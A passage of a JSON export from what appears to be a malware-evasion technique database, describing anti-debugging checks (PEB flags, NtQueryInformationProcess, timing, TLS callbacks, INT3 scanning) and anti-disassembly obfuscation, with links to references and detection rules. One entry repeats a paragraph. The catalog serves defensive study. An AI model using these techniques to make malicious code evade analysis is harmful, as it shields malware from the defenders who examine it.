"resources": "https://msdn.microsoft.com/en-us/library/windows/desktop/ms679280(v=vs.85).aspx",
"creation_date": "2019-03-18T13:25:12Z",
"tags": "",
"modification_date": "2023-10-04T10:42:13.178000Z",
"category": [
3
],
"rules": [
7
],
"attachments": [],
"featured_api": [
364,
419
],
"contributors": []
},
{
"id": 54,
"key": "ntqueryinformationprocess",
"unprotect_id": "U0120,B0001.012",
"name": "NtQueryInformationProcess",
"description": "This function retrieves information about a running process. Malware are able to detect if the process is currently being attached to a debugger using the `ProcessDebugPort (0x7)` information class.\r\n\r\nA nonzero value returned by the call indicates that the process is being debugged.",
"resources": "https://msdn.microsoft.com/en-us/library/windows/desktop/ms684280(v=vs.85).aspx",
"creation_date": "2019-03-18T13:26:52Z",
"tags": "NtQueryInformationProcess",
"modification_date": "2023-10-04T10:43:39.185000Z",
"category": [
3
],
"rules": [
79,
86
],
"attachments": [],
"featured_api": [
383,
419
],
"contributors": []
},
{
"id": 55,
"key": "ntsetinformationthread",
"unprotect_id": "U0119, B0001.014",
"name": "NtSetInformationThread",
"description": "[NtSetInformationThread](https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntsetinformationthread) can be used to hide threads from debuggers using the `ThreadHideFromDebugger` `ThreadInfoClass` (`0x11` / `17`). This is intended to be used by an external process, but any thread can use it on itself.\r\n\r\nAfter the thread is hidden from the debugger, it will continue running but the debugger won’t receive events related to this thread. This thread can perform anti-debugging checks such as code checksum, debug flags verification, etc.",
"resources": "https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/ntddk/nf-ntddk-zwsetinformationthread\nhttps://ntquery.wordpress.com/2014/03/29/anti-debug-ntsetinformationthread/",
"creation_date": "2019-03-18T13:27:48Z",
"tags": "NtSetInformationThread",
"modification_date": "2023-10-04T10:43:43.449000Z",
"category": [
3
],
"rules": [
78
],
"attachments": [],
"featured_api": [
2,
22,
360,
376,
381,
383,
425,
449,
452
],
"contributors": []
},
{
"id": 56,
"key": "ntqueryobject",
"unprotect_id": "U0118,B0001.013",
"name": "NtQueryObject",
"description": "This function retrieves object information. By calling this function with the class `ObjectTypeInformation` will retrieve the specific object type (debug) to detect the debugger.",
"resources": "https://msdn.microsoft.com/en-us/library/bb432383(v=vs.85).aspx\nhttps://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide?fbclid=IwAR0fpYHnQX6C3YyBx3pnZ1m3bOYawc-kUIhZn65T5Bf7pQR26fUuVNYPs_Q#NtQueryObject",
"creation_date": "2019-03-18T13:28:29Z",
"tags": "NtQueryObject",
"modification_date": "2023-10-04T10:42:54.288000Z",
"category": [
3
],
"rules": [
77
],
"attachments": [],
"featured_api": [
3,
363,
372,
376,
425
],
"contributors": []
},
{
"id": 57,
"key": "outputdebugstring",
"unprotect_id": "U0117,B0001.016",
"name": "OutputDebugString",
"description": "This Windows API is often used by developers for debugging purpose. It will display a text to the attached debugger. This API is also used by Malware to open a communication channel between one or multiple processes.\r\n\r\nIt is possible to use [OutputDebugString](https://docs.microsoft.com/en-us/windows/win32/api/debugapi/nf-debugapi-outputdebugstringw) in addition of [GetLastError](https://docs.microsoft.com/en-us/windows/win32/api/errhandlingapi/nf-errhandlingapi-getlasterror) / [SetLastError](https://docs.microsoft.com/en-us/windows/win32/api/errhandlingapi/nf-errhandlingapi-setlasterror) to detect debugger presence.",
"resources": "https://msdn.microsoft.com/en-us/library/windows/desktop/aa363362(v=vs.85).aspx",
"creation_date": "2019-03-18T13:29:14Z",
"tags": "outputdebugstring",
"modification_date": "2023-10-04T10:42:48.424000Z",
"category": [
3
],
"rules": [
14,
76
],
"attachments": [],
"featured_api": [
381,
383
],
"contributors": []
},
{
"id": 58,
"key": "eventpairhandles",
"unprotect_id": "U0116",
"name": "EventPairHandles",
"description": "An `EventPair` Object is an event constructed by two `_KEVENT` structures which are conventionally named High and Low. \r\n\r\nThere is a relation between generic Event Objects and Debuggers because they must create a custom event called `DebugEvent` able to handle exceptions. Due to the presence of events owned by the Debugger, every information relative to the events of a normal process differs from a debugged process.",
"resources": "https://www.evilfingers.com/publications/research_EN/EventPairsHandle.pdf",
"creation_date": "2019-03-18T13:31:13Z",
"tags": "EventPairHandles",
"modification_date": "2023-10-04T10:43:38.435000Z",
"category": [
3
],
"rules": [
75
],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 59,
"key": "csrgetprocessid",
"unprotect_id": "U0115",
"name": "CsrGetProcessID",
"description": "This function is undocumented within `OpenProcess`. It can be used to get the PID of CRSS.exe, which is a `SYSTEM` process. By default, a process has the `SeDebugPrivilege` privilege in their access token disabled. \r\n\r\nHowever, when the process is loaded by a debugger such as OllyDbg or WinDbg, the `SeDebugPrivilege` privilege is enabled. If a process is able to open CRSS.exe process, it means that the process `SeDebugPrivilege` enabled in the access token, and thus, suggesting that the process is being debugged.\r\n\r\nIf we call `OpenProcess` and pass the ID returned by `CsrGetProcessId`, no error will occur if the `SeDebugPrivilege` has been set with `SetPrivilege` / `AdjustTokenPrivileges`.",
"resources": "https://www.gironsec.com/blog/2013/12/other-antidebug-tricks/",
"creation_date": "2019-03-18T13:31:58Z",
"tags": "CsrGetProcessID",
"modification_date": "2023-10-04T10:43:42.118000Z",
"category": [
3
],
"rules": [
74
],
"attachments": [],
"featured_api": [
24,
425
],
"contributors": []
},
{
"id": 60,
"key": "closehandle-ntclose",
"unprotect_id": "U0114, B0001.003",
"name": "CloseHandle, NtClose",
"description": "When a process is debugged, calling `NtClose` or `CloseHandle` with an invalid handle will generate a `STATUS_INVALID_HANDLE` exception.\r\n\r\nThe exception can be cached by an exception handler. If the control is passed to the exception handler, it indicates that a debugger is present.",
"resources": "https://www.symantec.com/connect/articles/windows-anti-debug-reference\nhttps://anti-debug.checkpoint.com/techniques/object-handles.html#closehandle",
"creation_date": "2019-03-18T13:32:34Z",
"tags": "closehandle,ntclose",
"modification_date": "2023-10-04T10:43:46.973000Z",
"category": [
3
],
"rules": [
45,
73
],
"attachments": [],
"featured_api": [
23
],
"contributors": []
},
{
"id": 61,
"key": "isdebugged-flag",
"unprotect_id": "U0113,B0001.019",
"name": "IsDebugged Flag",
"description": "While a process is running, the location of the PEB can be referenced by the location `fs:[30h]`. For anti-debugging, malware will use that location to check the `BeingDebugged` flag, which indicates whether the specified process is being debugged.",
"resources": "",
"creation_date": "2019-03-18T13:33:59Z",
"tags": "NtQueryInformationProcess",
"modification_date": "2023-10-04T10:39:04.249000Z",
"category": [
3
],
"rules": [
26
],
"attachments": [],
"featured_api": [
6,
23,
24,
357,
376,
425
],
"contributors": []
},
{
"id": 62,
"key": "heap-flag",
"unprotect_id": "U0112,B0001.021",
"name": "Heap Flag",
"description": "`ProcessHeap` is located at `0x18` in the PEB structure. This first heap contains a header with fields used to tell the kernel whether the heap was created within a debugger. The heap contains two fields which are affected by the presence of a debugger. These fields are `Flags` and `ForceFlags`.\r\n\r\nThe values of `Flags and ForceFlags` are normally set to `HEAP_GROWABLE` and `0`, respectively.\r\n\r\nOn 64-bit Windows XP, and Windows Vista and higher, if a debugger is present, the Flags field is set to a combination of these flags:\r\n\r\n- `HEAP_GROWABLE (2)`\r\n- `HEAP_TAIL_CHECKING_ENABLED (0x20)`\r\n- `HEAP_FREE_CHECKING_ENABLED (0x40)`\r\n- `HEAP_VALIDATE_PARAMETERS_ENABLED (0x40000000)`\r\n\r\nWhen a debugger is present, the ForceFlags field is set to a combination of these flags:\r\n\r\n- `HEAP_TAIL_CHECKING_ENABLED (0x20)`\r\n- `HEAP_FREE_CHECKING_ENABLED (0x40)`\r\n- `HEAP_VALIDATE_PARAMETERS_ENABLED (0x40000000)`",
"resources": "https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software\nhttps://anti-debug.checkpoint.com/techniques/debug-flags.html#manual-checks-heap-flags",
"creation_date": "2019-03-18T13:34:32Z",
"tags": "heapflag",
"modification_date": "2023-10-04T10:42:51.159000Z",
"category": [
3
],
"rules": [],
"attachments": [],
"featured_api": [
258
],
"contributors": []
},
{
"id": 63,
"key": "ntglobalflag",
"unprotect_id": "U0111,B0001.036",
"name": "NtGlobalFlag",
"description": "The information that the system uses to determine how to create heap structures is stored at an undocumented location in the PEB at offset `0x68`. If the value at this location is `0x70`, we know that we are running in a debugger.\r\n\r\nThe `NtGlobalFlag` field of the Process Environment Block (0x68 offset on 32-Bit and 0xBC on 64-bit Windows) is 0 by default. Attaching a debugger doesn’t change the value of NtGlobalFlag. However, if the process was created by a debugger, the following flags will be set:\r\n\r\n- `FLG_HEAP_ENABLE_TAIL_CHECK` (0x10)\r\n- `FLG_HEAP_ENABLE_FREE_CHECK` (0x20)\r\n- `FLG_HEAP_VALIDATE_PARAMETERS` (0x40)\r\n\r\nThe presence of a debugger can be detected by checking a combination of those flags.",
"resources": "https://www.aldeid.com/wiki/PEB-Process-Environment-Block/NtGlobalFlag\nhttps://anti-debug.checkpoint.com/techniques/debug-flags.html#manual-checks-ntglobalflag",
"creation_date": "2019-03-18T13:35:07Z",
"tags": "ntglobalflag",
"modification_date": "2023-10-04T10:44:18.871000Z",
"category": [
3
],
"rules": [
4,
25
],
"attachments": [],
"featured_api": [
24,
355,
419,
425
],
"contributors": []
},
{
"id": 64,
"key": "rdtsc",
"unprotect_id": "U0126",
"name": "RDTSC",
"description": "The Read-Time-Stamp-Counter (RDTSC) instruction can be used by malware to determine how quicky the processor executes the program's instructions. It returns the count of the number of ticks since the last system reboot as a 64-bit value placed into `EDX:EAX`.\r\n\r\nIt will execute RDTSC twice and then calculate the difference between low order values and check it with CMP condition. If the difference lays below `0FFFh` no debugger is found if it is above or equal, then application is debugged.",
"resources": "https://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide\nhttps://www.aldeid.com/wiki/RDTSC-Read-Time-Stamp-Counter",
"creation_date": "2019-03-18T13:35:53Z",
"tags": "RDTSC",
"modification_date": "2023-10-04T10:42:41.264000Z",
"category": [
3
],
"rules": [
80
],
"attachments": [],
"featured_api": [
23
],
"contributors": []
},
{
"id": 65,
"key": "gettickcount",
"unprotect_id": "U0125,B0001.032",
"name": "GetTickCount",
"description": "This is typical timing function which is used to measure time needed to execute some function/instruction set. If the difference is more than fixed threshold, the process exits.\r\n\r\n`GetTickCount` reads from the `KUSER_SHARED_DATA` page. This page is mapped read-only into the user mode range of the virtual address and read-write in the kernel range. The system clock tick updates the system time, which is stored directly in this page.\r\n\r\n`ZwGetTickCount` is used the same way as `GetTickCount`. Using `KiGetTickCount` is faster than calling `ZwGetTickCount`, but slightly slower than reading from the `KUSER_SHARED_DATA` page directly.",
"resources": "https://researchcenter.paloaltonetworks.com/2015/10/ticked-off-upatre-malwares-simple-anti-analysis-trick-to-defeat-sandboxes/\nhttps://anti-debug.checkpoint.com/techniques/timing.html#kernel-timing",
"creation_date": "2019-03-18T13:36:32Z",
"tags": "gettickcount",
"modification_date": "2023-10-04T10:43:40.578000Z",
"category": [
3
],
"rules": [
28
],
"attachments": [],
"featured_api": [
413
],
"contributors": []
},
{
"id": 66,
"key": "getlocaltime-getsystemtime-timegettime-ntqueryperformancecounter",
"unprotect_id": "U0110,U1308,B0001.28",
"name": "GetLocalTime, GetSystemTime, timeGetTime, NtQueryPerformanceCounter",
"description": "When a debugger is present, and used to single-step through the code, there is a significant delay between the executions of the individual instructions, when compared to native execution.",
"resources": "https://www.malwinator.com/2016/01/03/part-2-antidebug/",
"creation_date": "2019-03-18T13:38:26Z",
"tags": "",
"modification_date": "2023-10-04T10:42:28.130000Z",
"category": [
1,
3
],
"rules": [
15
],
"attachments": [],
"featured_api": [
448
],
"contributors": []
},
{
"id": 67,
"key": "detecting-window-with-findwindow-api",
"unprotect_id": "U0406, U0123",
"name": "Detecting Window with FindWindow API",
"description": "The [FindWindowA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-findwindowa) / [FindWindowW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-findwindoww) function can be used to search for windows by name or class.\r\n\r\nIt is also possible to use [EnumWindows](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumwindows) API in conjunction with [GetWindowTextLength](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getwindowtextlengthw) and [GetWindowText](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getwindowtextw) to locate a piece of string that could reveal the presence of a known debugger.\r\n\r\n### Some Known Debuggers\r\n\r\n* ImmunityDebugger\r\n* OllyDbg\r\n* IDA\r\n* x64dbg / x32dbg\r\n* WinDbg",
"resources": "https://securingtomorrow.mcafee.com/mcafee-labs/overview-malware-self-defense-protection/",
"creation_date": "2019-03-18T13:39:00Z",
"tags": "WinAPI,FindWindow",
"modification_date": "2023-10-04T10:43:37.678000Z",
"category": [
3,
6
],
"rules": [
82
],
"attachments": [],
"featured_api": [
23,
24,
106,
133,
239,
290,
295
],
"contributors": []
},
{
"id": 68,
"key": "detecting-running-process-enumprocess-api",
"unprotect_id": "U0109,U0405,U1306",
"name": "Detecting Running Process: EnumProcess API",
"description": "Anti-monitoring is a technique used by malware to prevent security professionals from detecting and analyzing it. One way that malware can accomplish this is by using the `EnumProcess` function to search for specific processes, such as ollydbg.exe or wireshark.exe, which are commonly used by security professionals to monitor and analyze running processes on a system. \r\n\r\nBy detecting these processes and taking evasive action, such as terminating itself or encrypting its own code, malware can prevent security professionals from gaining visibility into its activities and disrupt their efforts to analyze it.",
"resources": "https://msdn.microsoft.com/en-us/library/windows/desktop/ms682623(v=vs.85).aspx",
"creation_date": "2019-03-18T13:39:38Z",
"tags": "EnumProcess function,\r\nOllydbg.exe,\r\nWireshark.exe,\r\nMonitoring,\r\nAnalysis,",
"modification_date": "2023-10-04T10:43:41.232000Z",
"category": [
1,
3,
6
],
"rules": [
72,
92
],
"attachments": [],
"featured_api": [
23,
24
],
"contributors": []
},
{
"id": 69,
"key": "tls-callback",
"unprotect_id": "U0124",
"name": "TLS Callback",
"description": "TLS (Thread Local Storage) callbacks are a mechanism in Windows that allows a program to define a function that will be called when a thread is created. These callbacks can be used to perform various tasks, such as initializing thread-specific data or modifying the behavior of the thread.\r\n\r\nAs an anti-debugging technique, a program can use a TLS callback to execute code before the main entry point of the program, which is defined in the PE (Portable Executable) header. This allows the program to run secretly in a debugger, as the debugger will typically start at the main entry point and may not be aware of the TLS callback.\r\n\r\nThe program can use the TLS callback to detect whether it is being debugged, and if it is, it can terminate the process or take other actions to evade debugging. This technique can be used to make it more difficult for a debugger to attach to the process and to hinder reverse engineering efforts.",
"resources": "https://resources.infosecinstitute.com/debugging-tls-callbacks/#gref\nhttps://isc.sans.edu/diary/How+Malware+Defends+Itself+Using+TLS+Callback+Functions/6655",
"creation_date": "2019-03-18T13:40:19Z",
"tags": "TLS callbacks,\r\nanti-debugging technique,\r\nthread,\r\nmain entry point,\r\ndebugger,",
"modification_date": "2023-10-04T10:44:42.226000Z",
"category": [
3
],
"rules": [
1
],
"attachments": [],
"featured_api": [
364
],
"contributors": []
},
{
"id": 70,
"key": "bad-string-format",
"unprotect_id": "U0104",
"name": "Bad String Format",
"description": "Bad string format is a technique used by malware to evade detection and analysis by OllyDbg, a popular debugger used by security researchers and analysts. This technique involves using malformed strings that exploit a known bug in OllyDbg, causing the debugger to crash or behave unexpectedly.\r\n\r\nFor example, the malware may use a string with multiple %s inputs, which OllyDbg is not able to handle correctly. This causes the debugger to crash or behave in an unpredictable manner, making it difficult for the analyst to continue their analysis. This technique can be effective in disrupting the analysis process and making it more difficult for the analyst to understand the malware's capabilities and behavior. However, it is only effective against OllyDbg, and other debuggers may not be affected by this technique.",
"resources": "http://www.openrce.org/reference_library/anti_reversing_view/8/OllyDbg%20Filename%20Format%20String/",
"creation_date": "2019-03-18T13:40:52Z",
"tags": "Bad string format,\r\nOllyDbg,\r\nDebugger evasion,\r\nString manipulation,",
"modification_date": "2023-10-04T10:43:43.022000Z",
"category": [
3
],
"rules": [
69
],
"attachments": [],
"featured_api": [
364
],
"contributors": []
},
{
"id": 71,
"key": "unhandled-exception-filter",
"unprotect_id": "U0108, B0001.030",
"name": "Unhandled Exception Filter",
"description": "An application-defined function that passes unhandled exceptions to the debugger, if the process is being debugged. Otherwise, it optionally displays an application error message box and causes the exception handler to be executed.\r\n\r\nIf an exception occurs and no exception handler is registered, the `UnhandledExceptionFilter` function will be called. It is possible to register a custom unhandled exception filter using the `SetUnhandledExceptionFilter`. But if the program is running under a debugger, the custom filter won’t be called, and the exception will be passed to the debugger. \r\n\r\nTherefore, if the unhandled exception filter is registered and the control is passed to it, then the process is not running with a debugger.",
"resources": "https://evilcodecave.wordpress.com/2008/07/24/setunhandledexception-filter-anti-debug-trick/\nhttps://anti-debug.checkpoint.com/techniques/exceptions.html",
"creation_date": "2019-03-18T13:42:14Z",
"tags": "exception",
"modification_date": "2023-10-04T10:43:55.620000Z",
"category": [
3
],
"rules": [
71
],
"attachments": [],
"featured_api": [
394,
403
],
"contributors": []
},
{
"id": 72,
"key": "performing-code-checksum",
"unprotect_id": "U0107",
"name": "Performing Code Checksum",
"description": "Adversaries may use code checksumming to detect if their code has been modified or tampered with. This technique involves calculating a checksum or hash of the code, storing it, and then periodically checking the current checksum against the stored one. If the checksums do not match, it indicates that the code has been modified and the adversary's code can take appropriate action, such as exiting or altering its behavior. \r\n\r\nThis technique can be used to detect if anti-debugging routines have been disabled or if the code has been tampered with in other ways. By detecting these modifications, the adversary's code can attempt to evade detection and make reverse engineering more difficult.",
"resources": "https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software",
"creation_date": "2019-03-18T13:42:45Z",
"tags": "",
"modification_date": "2023-10-04T10:43:00.625000Z",
"category": [
3
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 73,
"key": "interrupts",
"unprotect_id": "U0106",
"name": "Interrupts",
"description": "Adversaries may use exception-based anti-debugging techniques to detect whether their code is being executed in a debugger. These techniques rely on the fact that most debuggers will trap exceptions and not immediately pass them to the process being debugged for handling. \r\n\r\nBy triggering an exception and checking whether it is handled properly, the adversary's code can determine whether it is being executed in a debugger and take appropriate action, such as exiting or altering its behavior. This can be achieved using interrupt instructions such as INT 3 or UD2 to trigger the exception. This technique can be used to evade detection and make reverse engineering more difficult.",
"resources": "",
"creation_date": "2019-03-18T13:43:21Z",
"tags": "",
"modification_date": "2023-10-04T10:37:41.393000Z",
"category": [
3
],
"rules": [
125
],
"attachments": [],
"featured_api": [
360
],
"contributors": []
},
{
"id": 74,
"key": "int3-instruction-scanning",
"unprotect_id": "U0105, B0001.025",
"name": "INT3 Instruction Scanning",
"description": "Instruction `INT3` is an interruption which is used as Software breakpoints. These breakpoints are set by modifying the code at the target address, replacing it with a byte value `0xCC` (INT3 / Breakpoint Interrupt). \r\n\r\nThe exception `EXCEPTION_BREAKPOINT` (0x80000003) is generated, and an exception handler will be raised. Malware identify software breakpoints by scanning for the byte 0xCC in the protector code and/or an API code.",
"resources": "https://www.blackhat.com/presentations/bh-usa-07/Quist_and_Valsmith/Whitepaper/bh-usa-07-quist_and_valsmith-WP.pdf\nhttps://anti-debug.checkpoint.com/techniques/assembly.html#int3",
"creation_date": "2019-03-18T13:44:00Z",
"tags": "int3",
"modification_date": "2023-10-04T10:42:47.549000Z",
"category": [
3
],
"rules": [
70,
84
],
"attachments": [],
"featured_api": [
360
],
"contributors": []
},
{
"id": 75,
"key": "api-obfuscation",
"unprotect_id": "U0217, B0032.001",
"name": "API Obfuscation",
"description": "API obfuscation is a technique used by malware to make it more difficult for security analysts to understand and analyze the code. This is typically done by using a technique called API hashing, which replaces the names of API functions with a hashed value. When an analyst runs the malware through a disassembler tool, the hashed values are printed instead of the actual names of the functions, making it more difficult to understand the code and identify any potentially malicious behavior.\r\n\r\nThis technique is often used to hide suspicious API calls from the Import Address Table (IAT), which is used to store the addresses of functions imported from other libraries. By hiding these calls, malware authors can make it harder for analysts to identify and analyze their code.",
"resources": "https://www.ired.team/offensive-security/defense-evasion/windows-api-hashing-in-malware",
"creation_date": "2019-03-18T13:48:59Z",
"tags": "hashing, API, obfuscation, API hashing,\r\nImport Address Table (IAT),\r\nCode obfuscation,",
"modification_date": "2023-10-04T10:44:20.085000Z",
"category": [
5
],
"rules": [],
"attachments": [],
"featured_api": [
2,
7,
376,
425
],
"contributors": []
},
{
"id": 76,
"key": "control-flow-graph-flattening",
"unprotect_id": "U0216",
"name": "Control Flow Graph Flattening",
"description": "Control flow flattening is a technique used to obfuscate the control flow of a program, in order to make it more difficult for a disassembler to accurately interpret the program's behavior. This technique involves breaking up the nesting of loops and if-statements in a program, and then hiding each of them in a case of a large switch statement. This switch statement is then wrapped inside the body of a loop, which makes it difficult for the disassembler to follow the control flow and generate correct disassembly output.\r\n\r\nControl flow flattening is often used by malware authors to make it more difficult for analysts to reverse engineer the malware and understand its behavior. It can also be used to protect legitimate software from being reverse engineered by competitors or hackers.",
"resources": "http://ac.inf.elte.hu/Vol_030_2009/003.pdf",
"creation_date": "2019-03-18T13:51:58Z",
"tags": "Control flow flattening,\r\nAnti-disassembling,\r\nObfuscation,\r\nSwitch statement,\r\nLoop statement,\r\nControl flow,\r\nNesting,\r\nUnstructured code,\r\nComplex control flow,",
"modification_date": "2023-10-04T10:42:40.326000Z",
"category": [
5
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 78,
"key": "spaghetti-junk-code",
"unprotect_id": "U0215",
"name": "Spaghetti, Junk Code",
"description": "Junk code is a technique used to add meaningless or irrelevant instructions to a program, in order to make it more difficult for a disassembler to accurately interpret the program's behavior. This technique is often used by malware authors to make it more difficult for analysts to reverse engineer the malware and understand its behavior.\r\n\r\nJunk code can be inserted into a program without modifying the original code, and it will not affect the program's behavior. Instead, it will simply add extra instructions that the disassembler must process, which can make it more difficult for the disassembler to generate correct disassembly output.\r\n\r\nSpaghetti code, on the other hand, is a coding style that is characterized by a complex and unstructured control flow. This can make it difficult for a disassembler to accurately interpret the instructions and generate correct disassembly output, because the disassembler may not be able to follow the complex and unstructured control flow.",
"resources": "https://en.wikipedia.org/wiki/Spaghetti_code\nhttps://www.nozominetworks.com/blog/greyenergy-malware-research-paper-maldoc-to-backdoor/",
"creation_date": "2019-03-18T13:52:42Z",
"tags": "Junk code,\r\nSpaghetti code,\r\nAnti-disassembling,\r\nControl flow,\r\nObfuscation,\r\nInstruction insertion,\r\nUnstructured code,",
"modification_date": "2023-10-04T10:44:36.921000Z",
"category": [
5
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 79,
"key": "obscuring-control-flow-using-pointers",
"unprotect_id": "U0214",
"name": "Obscuring Control Flow Using Pointers",
"description": "The use of pointers in a program can be an issue for disassemblers, because pointers can be used in complex ways that are difficult for the disassembler to accurately interpret. This can make it more difficult for the disassembler to generate correct disassembly output, and can also make it more difficult for analysts to understand the program's behavior.\r\n\r\nPointers are a common programming idiom used in C and C++ to reference memory locations and manipulate data in memory. They are typically implemented as variables that contain the memory address of another variable. This allows the programmer to access and modify the data stored at that memory address, without having to know the exact memory address of the data.",
"resources": "http://staff.ustc.edu.cn/~bjhua/courses/security/2014/readings/anti-disas.pdf",
"creation_date": "2019-03-18T13:53:11Z",
"tags": "Pointers,\r\nAnti-disassembling,\r\nControl flow,\r\nProgram behavior,\r\nMemory addresses,\r\nData manipulation,",
"modification_date": "2023-10-04T10:43:02.048000Z",
"category": [
5
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 81,
"key": "abusing-the-return-pointer",
"unprotect_id": "U0213",
"name": "Abusing the Return Pointer",
"description": "Abusing the return pointer is an anti-disassembling technique that involves using the return instruction (RETN) in a way that is not expected by the disassembler. This can make it more difficult for the disassembler to accurately reconstruct the program's original instructions and can also make it more difficult for analysts to understand the program's behavior.\r\n\r\nThe RETN instruction is normally used to return from a function call, by returning control to the calling function. It typically takes a single operand, which is the number of bytes that the caller should add to the stack pointer after the return has been executed. This allows the caller to clean up the stack and restore the registers to their original values before the call was made.\r\n\r\nHowever, if the RETN instruction is used for another purpose, the disassembler may not be able to accurately interpret it and may generate incorrect disassembly output. For example, the RETN instruction could be used as a jump target for other instructions, such as a CALL or JMP instruction. This would cause the disassembler to prematurely terminate the function, because it would assume that the RETN instruction marks the end of the function.",
"resources": "https://www.malwinator.com/2015/11/27/anti-disassembly-techniques-used-by-malware-a-primer-part-2/",
"creation_date": "2019-03-18T13:53:57Z",
"tags": "Abusing the return pointer,\r\nAnti-disassembling,\r\nDisassembler,\r\nDebugger,\r\nControl flow,\r\nReturn instruction (RETN),\r\nFunction call,\r\nStack pointer,\r\nRegister,",
"modification_date": "2023-10-04T10:44:45.279000Z",
"category": [
5
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 82,
"key": "obscuring-control-flow",
"unprotect_id": "U0212",
"name": "Obscuring Control Flow",
"description": "Obscuring control flow is an anti-disassembling technique that involves using methods of flow control that are difficult or impossible for disassemblers and debuggers to follow. This can make it more difficult for analysts to understand the program's behavior and can also make it more difficult for other tools, such as debuggers, to accurately interpret the program.\r\n\r\nOne example of this technique is the use of the Structure Exception Handling (SEH) mechanism in the Microsoft Windows operating system. SEH provides a way to handle exceptions, which are runtime errors that occur during the execution of a program. It allows the programmer to define a set of exception handlers that are called whenever an exception occurs. These exception handlers can be used to handle the exception and continue the program's execution, or to log the error and terminate the program.\r\n\r\nSEH provides a method of flow control that is difficult for disassemblers and debuggers to follow, because the exception handlers are not part of the program's normal control flow. Disassemblers and debuggers are not able to accurately reconstruct the program's original instructions when SEH is used, because they cannot determine the intended behavior of the program without actually executing it.",
"resources": "https://www.malwinator.com/2015/11/27/anti-disassembly-techniques-used-by-malware-a-primer-part-2/",
"creation_date": "2019-03-18T13:54:18Z",
"tags": "Obscuring control flow,\r\nAnti-disassembling,\r\nException handling,\r\nStructure Exception Handling (SEH),\r\nControl flow,\r\nException handler,",
"modification_date": "2023-10-04T10:42:49.627000Z",
"category": [
5
],
"rules": [],
"attachments": [],
"featured_api": [
394
],
"contributors": []
},
{
"id": 83,
"key": "impossible-disassembly",
"unprotect_id": "U0211",
"name": "Impossible Disassembly",
"description": "Impossible disassembly is an anti-disassembling technique that involves inserting data bytes after a conditional jump instruction in order to prevent the real instruction that follows from being disassembled. This technique takes advantage of a basic assumption in disassembly, which states that one byte is only interpreted in the context of one instruction. By inserting a byte that is the opcode for a multibyte instruction, the disassembler will be unable to correctly interpret the next instruction, and will therefore generate incorrect disassembly output.",
"resources": "https://www.slideshare.net/SamBowne/practical-malware-analysis-ch-15-antidisassembly\nhttps://medium.com/swlh/assembly-wrapping-a-new-technique-for-anti-disassembly-c144eb90e036",
"creation_date": "2019-03-18T13:54:40Z",
"tags": "Impossible disassembly,\r\nAnti-disassembling,\r\nDisassembler,\r\nConditional jump,\r\nData byte,\r\nDisassembly output,\r\nDisassembly accuracy,",
"modification_date": "2023-10-04T10:44:47.927000Z",
"category": [
5
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 84,
"key": "jump-with-same-target",
"unprotect_id": "U0210",
"name": "Jump With Same Target",
"description": "Jump with the same target is an anti-disassembling technique that involves using back-to-back conditional jump instructions that both point to the same target. This can make it difficult for a disassembler to accurately reconstruct the original instructions of the program, as the disassembler will not be able to determine the intended behavior of the program without actually executing it.\r\n\r\nFor example, suppose a program contains the following instructions:\r\n\r\n```assembly\r\nmov eax, 0x12345678\r\njz loc_512\r\njnz loc_512\r\n```\r\n\r\nIn this case, the jz and jnz instructions are back-to-back conditional jump instructions that both point to the same target, loc_512. This means that the program will always jump to the loc_512 location, regardless of the value of the eax register. However, a disassembler that is working correctly would not be able to determine this intended behavior, as it only disassembles one instruction at a time and does not consider the behavior of the program as a whole.\r\n\r\nIn this case, the jz and jnz instructions are back-to-back conditional jump instructions that both point to the same target, loc_512. This means that the program will always jump to the loc_512 location, regardless of the value of the eax register. However, a disassembler that is working correctly would not be able to determine this intended behavior, as it only disassembles one instruction at a time and does not consider the behavior of the program as a whole.",
"resources": "https://www.malwinator.com/2015/11/22/anti-disassembly-used-in-malware-a-primer/",
"creation_date": "2019-03-18T13:55:03Z",
"tags": "Jump with the same target,\r\nAnti-disassembling,\r\nDisassembler,\r\nConditional jump,\r\nTarget address,\r\nDisassembly output,\r\nDisassembly accuracy,\r\nUnconditionnal jum,",
"modification_date": "2023-10-04T10:42:25.972000Z",
"category": [
5
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 85,
"key": "opcode-obfuscation",
"unprotect_id": "U0209",
"name": "Opcode Obfuscation",
"description": "Opcode obfuscation is an anti-disassembling technique that involves modifying the opcodes of a program's machine language instructions in order to make it more difficult for a disassembler to accurately reconstruct the original instructions. This can be done in a variety of ways, such as by using equivalent but different opcodes for the same operation, by adding additional instructions or data to the program, or by rearranging the program's instructions in a non-standard order.\r\n\r\nOpcode obfuscation is a common technique used by malware authors and other attackers to make it more difficult for analysts to disassemble and understand their programs. It can be used in conjunction with other anti-disassembling techniques, such as the call trick or the insertion of garbage bytes, to create even more effective and powerful exploits.",
"resources": "https://en.wikibooks.org/wiki/X86_Disassembly/Code_Obfuscation",
"creation_date": "2019-03-18T13:55:35Z",
"tags": "Opcode obfuscation,\r\nAnti-disassembling,\r\nDisassembler,\r\nMachine language,\r\nOpcode,\r\nEquivalent opcodes,\r\nDisassembly output,\r\nDisassembly accuracy,",
"modification_date": "2023-10-04T10:42:44.100000Z",
"category": [
5
],
"rules": [],
"attachments": [],
"featured_api": [],
"contributors": []
},
{
"id": 86,
